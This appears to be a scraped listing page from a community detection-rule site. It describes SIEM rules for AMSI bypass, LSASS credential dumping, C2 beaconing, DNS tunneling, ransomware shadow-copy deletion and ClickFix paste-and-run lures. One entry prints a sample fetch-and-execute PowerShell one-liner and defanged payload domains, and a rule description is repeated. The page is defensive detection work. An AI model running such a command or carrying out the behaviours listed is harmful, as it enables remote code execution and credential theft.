Detections
Explore public detection logic contributed by the community across SIEM and rule languages.
60,137 detections
Filters
Last updated
All Time
Detection languages
23,195
16,896
4,280
4,077
3,289
Contributors
11,679
8,664
7,082
6,786
4,478
Categories
20,098
11,459
5,732
4,979
4,798
Platforms
39,719
6,854
6,349
4,078
3,510
Products / Services
10,348
9,600
6,991
4,335
3,859
MITRE Techniques
18,030
15,416
12,645
8,188
6,021
CVEs
68
68
58
56
50
IDS Classtypes
1,896
482
449
381
237
IDS Protocols
2,379
848
406
318
97
Detects attempts to bypass or tamper with the Antimalware Scan Interface (AMSI) in-memory by monitoring command lines of common script-hosting processes (e.g., PowerShell, WScript, Rundll32) for strings indicative of AmsiScanBuffer patching, reflection, or manual configuration of AMSI initialization states.
Detects the creation of a remote thread in a process by another process, excluding self-injection. This behavior is a common indicator of process injection techniques used to execute code within the address space of a target process.
Detects processes attempting to obtain high-privileged handles (e.g., VM_READ/ALL_ACCESS) to the lsass.exe process. Accessing lsass.exe is a common method for credential dumping, often used by malware or red-team tools to extract sensitive credentials from memory. This rule monitors process access events and ignores known benign or administrative processes that legitimately access LSASS.
This rule detects potential command-and-control (C2) activity by correlating the creation of known Cobalt Strike or Sliver framework named pipes with subsequent repeated HTTP/S network beaconing from the same process or host. The rule identifies processes establishing suspicious named pipes, then looks for persistent network connections to standard web ports (80, 443) within a 30-minute window, flagging instances where significant beaconing count is observed.
This rule detects potential DNS tunneling activities often used for Command and Control (C2) communication. It monitors for high volumes of DNS requests involving records commonly abused for tunneling (TXT, NULL, CNAME) from a single host to a specific parent domain. It further identifies suspicious patterns characterized by long, high-entropy subdomain labels (>45 characters) and a high frequency of distinct labels, which are indicative of encoded C2 traffic.
Detects the loading of known vulnerable kernel drivers commonly used for Bring Your Own Vulnerable Driver (BYOVD) attacks, followed within 15 minutes by administrative attempts to stop, delete, or kill common security product processes or services.
Detects the use of native Windows utilities (vssadmin, wbadmin, bcdedit, wmic) to delete shadow copies, backup catalogs, or modify boot configuration data to disable recovery. This behavior is commonly associated with ransomware and data destruction attacks intended to prevent system restoration.
Detects instances where a user grants consent to an unverified OAuth application with high-privilege scopes (e.g., Mail.Read, Directory.Read.All), followed by an authentication event using that same application ID from a different IP address within 24 hours. This behavior is indicative of potential consent phishing or OAuth token abuse, where an adversary harvests tokens to maintain persistent, remote access to email or directory services.
Detects a non-browser process initiating network connections to four distinct commercial LLM API providers (DeepSeek, OpenRouter, Mistral, and Google Gemini) within a 5-minute interval. This behavior is indicative of a C2 pattern where an adversary uses multiple LLM backends to perform plurality-vote or redundant queries, bypassing typical browser-based AI aggregation services.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
This rule detects the execution of browser automation and testing tools (such as Playwright, Puppeteer, Selenium, and various browser drivers) when initiated by common, non-development-related parent processes like Microsoft Office applications, Explorer, or service hosts. This behavior is indicative of potential malicious activity, such as automated credential harvesting or unauthorized web interaction initiated by a compromised document or process.
Detects anomalous GitHub audit log activity indicative of a potential supply-chain compromise. The rule identifies workflows or automated entities (Bot/App) that access sensitive Action secrets followed by the publishing of packages to public registries like PyPI or npm. This activity can represent the precursor steps of token-theft-driven malicious package injection.
Detects the execution of known living-off-the-land binaries or network utilities initiated by or involving processes related to the Semantic Kernel framework (e.g., SKAgent, kernel.run). This pattern is often indicative of automated execution, potentially associated with agent-based activity or malicious orchestration leveraging AI framework components.
Detects anomalous executions of ctfmon.exe that deviate from known-good parent process patterns, such as unexpected parent processes (e.g., script hosts, LOLBins) or execution from locations other than C:\Windows\System32\ctfmon.exe. This rule is designed to help identify potential masquerading or process injection associated with exploitation attempts, including CVE-2026-45586.
Detects removable-media/storage interaction events initiated by the PlugX side-loaded process chain (GRrte.exe / Jarte.exe), consistent with the PlugX core's drive-type query and removable-media ejection behavior (GetDriveTypeW / DeviceIoControl)
This rule monitors for various indicators of compromise (IOCs) including malicious domains, IP addresses, specific URI paths, file names, and file hashes. It aggregates telemetry from network, file, process, and certificate events to detect potential threats interacting with known bad infrastructure or executing suspicious files associated with malware campaigns.
Detects the use of PowerShell to modify Microsoft Defender antivirus preferences by adding exclusion paths or processes. This behavior is indicative of an attacker attempting to bypass security software detection by excluding their malicious tools or staging areas from scanning.
Detects the installation of unauthorized AI-related browser extensions followed by outbound network communication from the browser process to known external AI service API endpoints within one hour. This behavior is indicative of potential data exfiltration via shadow AI tools, bypassing standard enterprise DLP controls.
Detects multiple reconnaissance commands executed by PowerShell processes running as the SYSTEM account. This behavior is indicative of an attacker attempting to enumerate domain trusts, group memberships, or user sessions on a host to facilitate lateral movement or privilege escalation.
This rule detects potential ClickFix/InstallFix attacks where a user is socially engineered to copy and paste a malicious command from a website that mimics a legitimate developer tool installation (e.g., Claude Code, NotebookLM). The detection flags the use of common download-and-execute cmdlets (e.g., irm, iwr, iex) within common Windows shell interpreters while excluding known legitimate vendor install domains.
This rule detects potential ClickFix/InstallFix attacks where a user is socially engineered to copy and paste a malicious command from a website that mimics a legitimate developer tool installation (e.g., Claude Code, NotebookLM). The detection flags the use of common download-and-execute cmdlets (e.g., irm, iwr, iex) within common Windows shell interpreters while excluding known legitimate vendor install domains.





